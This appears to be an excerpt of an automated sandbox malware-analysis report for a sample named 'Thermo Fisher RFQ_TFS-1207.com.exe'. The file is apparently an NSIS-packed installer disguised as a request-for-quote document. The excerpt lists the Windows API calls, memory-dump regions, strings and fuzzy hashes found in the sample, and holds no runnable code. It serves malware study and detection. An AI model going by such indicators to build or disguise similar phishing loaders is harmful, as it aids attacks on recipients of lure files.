                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
                                              • Instruction ID: bf706e621430f2b8e1e8296bf8ea73d697ba0e02d4cfc8f60e3200fcd9798b2c
                                              • Opcode Fuzzy Hash: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
                                              • Instruction Fuzzy Hash: 57212A72904119AFCB05DF94DE45AEEBBB5EB08300F14403AF945F62A0DB389D81DB98
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FE722D8,?,00000808), ref: 6FE716D5
                                              • GlobalAlloc.KERNEL32(?,00000000,?,00000000,6FE722D8,?,00000808), ref: 6FE716DC
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FE722D8,?,00000808), ref: 6FE716F0
                                              • GetProcAddress.KERNEL32(6FE722D8,00000000), ref: 6FE716F7
                                              • GlobalFree.KERNEL32(00000000), ref: 6FE71700
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                              • String ID:
                                              • API String ID: 1148316912-0
                                              • Opcode ID: d719245b17e3c860621d59a5b6f451da3fe4eb2e43e8072754e6911b9a5f50c2
                                              • Instruction ID: 750004ff1fc17039293fa46303c7ae1c527e85f8b5f43eeeea44f5e26cb713d7
                                              • Opcode Fuzzy Hash: d719245b17e3c860621d59a5b6f451da3fe4eb2e43e8072754e6911b9a5f50c2
                                              • Instruction Fuzzy Hash: F8F01272106538BBDA2156A69C4CC9B7E9DEF8B2F5B110216F618911A085615C11D7F2
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
                                              • Instruction ID: 31ba3c168d84f0c85bcad1357d39928db2ba622a9cc012c1a012c7db44d830b4
                                              • Opcode Fuzzy Hash: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
                                              • Instruction Fuzzy Hash: 66218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                              APIs
                                              • lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 00404E21
                                              • wsprintfW.USER32 ref: 00404E2A
                                              • SetDlgItemTextW.USER32(?,007A1748), ref: 00404E3D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
                                              • API String ID: 3540041739-3551169577
                                              • Opcode ID: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                              • Instruction ID: afd2be291b2a15d2af8ae11ee91158e81c8ac3063311500d61ab43a3e8b0c9b4
                                              • Opcode Fuzzy Hash: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                              • Instruction Fuzzy Hash: 6F11E77360423837DB10996D9C45E9E3298DF85374F254237FA66F31D1EA79DC2182E8
                                              APIs
                                                • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,?,0000000A,?), ref: 00406561
                                                • Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405EDC
                                                • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                                • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                              • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405F84
                                              • GetFileAttributesW.KERNEL32(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\), ref: 00405F94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\$P?z
                                              • API String ID: 3248276644-3222627218
                                              • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                              • Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
                                              • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                              • Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00405E29
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00405E33
                                              • lstrcatW.KERNEL32(?,0040A014,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00405E45
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-3355392842
                                              • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                              • Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
                                              • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                              • Instruction Fuzzy Hash: EDD0A771101534BAC212AB54AC04CDF73ACAF46344342403BF541B30A5C77C5D5187FD
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: a53ea362e88dd6932f52b9f5fca08d497e843f5a867dfb0c86ebadf4efa3d515
                                              • Instruction ID: 21475f17d8681c229aabab6b402b524ba69cda029c84bcd2781fb7cc84537844
                                              • Opcode Fuzzy Hash: a53ea362e88dd6932f52b9f5fca08d497e843f5a867dfb0c86ebadf4efa3d515
                                              • Instruction Fuzzy Hash: DA519DB5900712DFDB20CFA8D964A667FE9FB47328B20451AF944DB250EB38F911DB50
                                              APIs
                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll), ref: 004026BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp$C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll
                                              • API String ID: 1659193697-4265805118
                                              • Opcode ID: b8575b449f0ed2f2ae019e5d4e70b49293f3ca762bd0c00a65c0af1d038813a1
                                              • Instruction ID: 017f71272b68274a12e342b3970613002fe1d3414b89f7e2a3fd3533f9475010
                                              • Opcode Fuzzy Hash: b8575b449f0ed2f2ae019e5d4e70b49293f3ca762bd0c00a65c0af1d038813a1
                                              • Instruction Fuzzy Hash: C7110D72A10206BBCB00BBB19F46AAE7B616F51748F20843FF502F61D1DAFD8851631E
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                              • GetTickCount.KERNEL32 ref: 0040306F
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                              • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                              • String ID:
                                              • API String ID: 2102729457-0
                                              • Opcode ID: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                              • Instruction ID: 04dff40eaa5975d4421a2039d3eb5be5080597dcfa90b8d0ab21d67e5ec7c10f
                                              • Opcode Fuzzy Hash: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                              • Instruction Fuzzy Hash: BFF05430406621AFC6616F50FD08A9B7B69FB45B12B45843BF145F11E8C73C48818B9D
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 0040557C
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004055CD
                                                • Part of subcall function 0040451F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                              • Instruction ID: 8cb385540c394feb6b7acedb458c1b163c7bd0e2eecbca803c6ec6ccc0281e24
                                              • Opcode Fuzzy Hash: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                              • Instruction Fuzzy Hash: 68017C71101609FBEF205F11DD84A9B3A2BEBC4754F20403BFA05761D5D73A8D929E6D
                                              APIs
                                              • FreeLibrary.KERNEL32(6FE70000,75F03420,00000000,C:\Users\user\AppData\Local\Temp\,00403B69,00403A7F,?,?,?,0000000A,?), ref: 00403BAB
                                              • GlobalFree.KERNEL32(00A7CF70), ref: 00403BB2
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Free$GlobalLibrary
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 1100898210-3355392842
                                              • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                              • Instruction ID: b7081a2a86391088548fef66407111aafa244a1a89fd4905b066b82f00895e7d
                                              • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                              • Instruction Fuzzy Hash: 59E0C23340053057CB211F45ED04B1AB778AF95B26F09807BE940BB2618BBC2C438FC8
                                              APIs
                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00405E75
                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00405E85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-3370423016
                                              • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                              • Instruction ID: e625fb8110be14d05545ed3956eb9dcd351d24123ebbdb87cfc6543e98ba95a5
                                              • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                              • Instruction Fuzzy Hash: 27D05EB3400920AAC312A704DD00DAF73A8EF523447464466F881A71A5D7785D8186EC
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD1
                                              • CharNextA.USER32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE2
                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
